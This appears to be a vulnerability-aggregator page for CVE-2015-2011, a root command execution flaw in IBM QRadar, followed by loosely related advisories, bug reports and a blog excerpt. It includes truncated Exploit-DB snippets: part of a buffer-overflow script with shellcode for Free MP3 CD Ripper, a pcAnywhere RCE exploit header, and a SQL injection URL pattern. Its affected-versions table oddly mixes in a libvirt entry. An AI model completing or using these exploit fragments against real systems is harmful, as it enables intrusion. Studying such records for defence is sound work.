CVE-2015-2011
published 2015-10-04CVE-2015-2011: The xmlrpc.cgi Webmin script in IBM QRadar SIEM 7.1 MR2 before Patch 11 IF02 and 7.2.x before 7.2.5 Patch 4 allows remote authenticated users to execute…
PriorityP351critical9CVSS 2.0
AVNACLAuSCCICAC
EPSS
2.21%
80.5th percentile
The xmlrpc.cgi Webmin script in IBM QRadar SIEM 7.1 MR2 before Patch 11 IF02 and 7.2.x before 7.2.5 Patch 4 allows remote authenticated users to execute arbitrary commands with root privileges via unspecified vectors.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| ibm | qradar_security_information_and_event_manager | — | — |
| redhat | libvirt | >= 0 < 1.2.2-0ubuntu13.1.16 | 1.2.2-0ubuntu13.1.16 |
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
ghsa5.9MEDIUM
osv5.9MEDIUM
vendor_redhat5.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8fmv-3pp6-g85j: The xmlrpc
ghsa_unreviewed·2022-05-17
CVE-2015-2011 [HIGH] CWE-77 GHSA-8fmv-3pp6-g85j: The xmlrpc
The xmlrpc.cgi Webmin script in IBM QRadar SIEM 7.1 MR2 before Patch 11 IF02 and 7.2.x before 7.2.5 Patch 4 allows remote authenticated users to execute arbitrary commands with root privileges via unspecified vectors.
GHSA
Use of a Broken or Risky Cryptographic Algorithm in Apache WSS4J
ghsa·2022-05-14·CVSS 5.9
CVE-2015-0226 [MEDIUM] CWE-327 Use of a Broken or Risky Cryptographic Algorithm in Apache WSS4J
Use of a Broken or Risky Cryptographic Algorithm in Apache WSS4J
Apache WSS4J before 1.6.17 and 2.0.x before 2.0.2 improperly leaks information about decryption failures when decrypting an encrypted key or message data, which makes it easier for remote attackers to recover the plaintext form of a symmetric key via a series of crafted messages. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-2487.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
OSV
libvirt vulnerabilities
osv·2016-01-12·CVSS 5.9
CVE-2011-4600 libvirt vulnerabilities
libvirt vulnerabilities
It was discovered that libvirt incorrectly handled the firewall rules on
bridge networks when the daemon was restarted. This could result in an
unintended firewall configuration. This issue only applied to Ubuntu 12.04
LTS. (CVE-2011-4600)
Peter Krempa discovered that libvirt incorrectly handled locking when
certain ACL checks failed. A local attacker could use this issue to cause
libvirt to stop responding, resulting in a denial of service. This issue
only applied to Ubuntu 14.04 LTS. (CVE-2014-8136)
Luyao Huang discovered that libvirt incorrectly handled VNC passwords in
shapshot and image files. A remote authenticated user could use this issue
to possibly obtain VNC passwords. This issue only affected Ubuntu 14.04
LTS. (CVE-2015-0236)
Han Han discovered that
Red Hat
wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487)
vendor_redhat·2015-02-10·CVSS 5.9
CVE-2015-0226 [MEDIUM] CWE-327 wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487)
wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487)
Apache WSS4J before 1.6.17 and 2.0.x before 2.0.2 improperly leaks information about decryption failures when decrypting an encrypted key or message data, which makes it easier for remote attackers to recover the plaintext form of a symmetric key via a series of crafted messages. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-2487.
It was found that a prior countermeasure in Apache WSS4J for Bleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an exception that permitted an attacker to determine the failure of the attempted attack, thereby leaving WSS4J vulnerable to the attack. The original flaw allowed a remote attacker to recover the entire plain text f
No detection rules found.
Exploit-DB
Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
exploitdb·2015-11-02
CVE-2011-3478 Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
---
#!/usr/bin/python
################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
# Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
# Symantec pcAnywhere 12.5.x through 12.5.3
# Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
# Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# --------------------------------------------
# Microsoft Windows Vista Ultimate SP1 x86 EN
# Microsoft Windo
Exploit-DB
ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)
exploitdb·2015-06-12
CVE-2015-4659 ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)
ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)
---
# Exploit Title: ClickHeat
/* CODE */
---- Solution ----
The ClickHeat project seems to be dead, as it has not been updated since
late 2011. Due to this, I truly doubt a patch will be issued so I would
recommend removing this product from your website.
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
exploitdb·2015-03-22
CVE-2011-5165 Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
#[+] Date: 20-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
## EDB Note: Didn't work with Windows 7.
from struct import pack
file="evilfile.wav"
junk="\x41"*4112
eip = pack('<I',0x7C9D30D7)
nops = "\x90" * 3
#Calc.exe Shellcode
#POC:http://youtu.be/_uvHKonqO2g
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
"\xb4\xae\x7d\x0
Exploit-DB
WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting
exploitdb·2015-03-03
CVE-2015-2216 WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting
WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting
---
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : [email protected]
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
details |
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl.
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims and all tryag member's
:) from morocco
Bugzilla
CVE-2011-5325 busybox: Path traversal via crafted tar file containing symlink
bugzilla·2015-10-22·CVSS 7.5
CVE-2011-5325 [HIGH] CVE-2011-5325 busybox: Path traversal via crafted tar file containing symlink
CVE-2011-5325 busybox: Path traversal via crafted tar file containing symlink
A path traversal vulnerability was found in Busybox implementation of tar. tar will extract a symlink that points outside of the current working directory and then follow that symlink when extracting other files. This allows for a directory traversal attack when extracting untrusted tarballs.
Reproducer:
http://git.busybox.net/busybox/commit/?id=a116552869db5e7793ae10968eb3c962c69b3d8c
CVE assignment:
http://seclists.org/oss-sec/2015/q4/121
Discussion:
Created busybox tracking bugs for this issue:
Affects: fedora-all [bug 1274227]
---
Upstream bug:
https://bugs.busybox.net/8411
---
The busybox packages are shipped in Red Hat Enterprise Linux 6 and earlier. However, they have a rather narrow use case
Bugzilla
CVE-2011-5320 glibc: scanf implementation crashes on certain inputs
bugzilla·2015-02-26·CVSS 6.2
CVE-2011-5320 [MEDIUM] CVE-2011-5320 glibc: scanf implementation crashes on certain inputs
CVE-2011-5320 glibc: scanf implementation crashes on certain inputs
It was reported [1] that scanf and related functions are crashing due to a bug [2] in glibc.
[1]: http://seclists.org/oss-sec/2015/q1/686
[2]: https://sourceware.org/bugzilla/show_bug.cgi?id=13138
Discussion:
Statement:
This issue affects the version of glibc package as shipped with Red Hat Enterprise Linux 5 and 6. Red Hat Product Security has rated this issue as having Low security impact. A future update in Red Hat Enterprise Linux 6 may address this issue. This issue did not affect the versions of glibc as shipped with Red Hat Enterprise Linux 7.
Red Hat Enterprise Linux 5 is now in Extended Life Cycle phase of the support and maintenance life cycle. This issue is not currently planned to be addressed in future u
Schneier
Research on Patch Deployment - Schneier on Security
blogs_schneier·2015-05-01·CVSS 8.8
[HIGH] Research on Patch Deployment - Schneier on Security
## Research on Patch Deployment
New research indicates that it’s very hard to completely patch systems against vulnerabilities:
It turns out that it may not be that easy to patch vulnerabilities completely. Using WINE , we analyzed the patch deployment process for 1,593 vulnerabilities from 10 Windows client applications, on 8.4 million hosts worldwide [Oakland 2015] . We found that a host may be affected by multiple instances of the same vulnerability, because the vulnerable program is installed in several directories or because the vulnerability is in a shared library distributed with several applications. For example, CVE-2011-0611 affected both the Adobe Flash Player and Adobe Reader (Reader includes a library for playing .swf objects embedded in a PDF). Because updates for the two p
2015-10-04
Published